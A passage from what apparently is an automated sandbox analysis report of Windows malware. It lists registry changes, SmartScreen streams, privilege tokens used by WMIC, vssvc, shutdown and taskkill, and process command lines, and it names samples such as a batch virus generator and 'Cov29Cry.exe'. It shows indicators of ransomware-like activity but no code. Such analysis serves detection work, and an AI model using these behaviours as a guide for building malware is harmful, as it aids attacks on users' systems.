| Set value (int) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0\NodeSlot = "6" | C:\Windows\SysWOW64\certreq.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9} | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9} | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\껟â¾â€€è€€\ = "md_auto_file" | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1280x720x96(1).right = "1050" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202 | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\SniffedFolderType = "Generic" | C:\Windows\SysWOW64\certreq.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\md_auto_file\shell | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1280x720x96(1).bottom = "650" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff | C:\Windows\SysWOW64\certreq.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\2 = 5c00320088ea0000e358672d20005369676d612e7a697000440009000400efbee358672de358682d2e00000000000000000000000000000000000000000000000000832aa4005300690067006d0061002e007a0069007000000018000000 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\HotKey = "0" | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\GroupByDirection = "1" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1280x720x96(1).left = "250" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 | C:\Windows\SysWOW64\certreq.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Windows\SysWOW64\certreq.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\ShowCmd = "1" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\GroupByDirection = "1" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\FFlags = "18874369" | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202 | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\2\NodeSlot = "7" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\FFlags = "18874385" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\ShowCmd = "1" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\ShowCmd = "1" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\Rev = "0" | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\md_auto_file\shell\Read\command\ = "\"C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Reader\\AcroRd32.exe\" \"%1\"" | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WFlags = "0" | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\MRUListEx = 00000000ffffffff | C:\Windows\SysWOW64\certreq.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\GroupByDirection = "1" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\Rev = "0" | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202 | C:\Windows\SysWOW64\certreq.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WFlags = "0" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\GroupByDirection = "1" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\md_auto_file\shell\Read | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1280x720x96(1).top = "50" | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000070000001800000030f125b7ef471a10a5f102608c9eebac0a000000f000000030f125b7ef471a10a5f102608c9eebac04000000a0000000e0cc8de8b3b7d111a9f000aa0060fa310600000080000000e0cc8de8b3b7d111a9f000aa0060fa31020000005000000030f125b7ef471a10a5f102608c9eebac0c00000080000000e0cc8de8b3b7d111a9f000aa0060fa31040000005000000030f125b7ef471a10a5f102608c9eebac0e000000a0000000 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Windows\explorer.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 412264.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 664769.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 732348.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 539169.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\DELmE's Batch Virus Generator v 2.0.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\DELmE's Batch Virus Generator v 2.0.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\shutdown.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\shutdown.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7D12.tmp\Cov29Cry.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wbengine.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\wbengine.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wbengine.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\auditpol.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy service COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.com
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc482146f8,0x7ffc48214708,0x7ffc48214718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2108 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2668 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3224 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3256 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4684 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5132 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5132 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5208 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5224 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5260 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5700 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5792 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5960 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6096 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2220 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
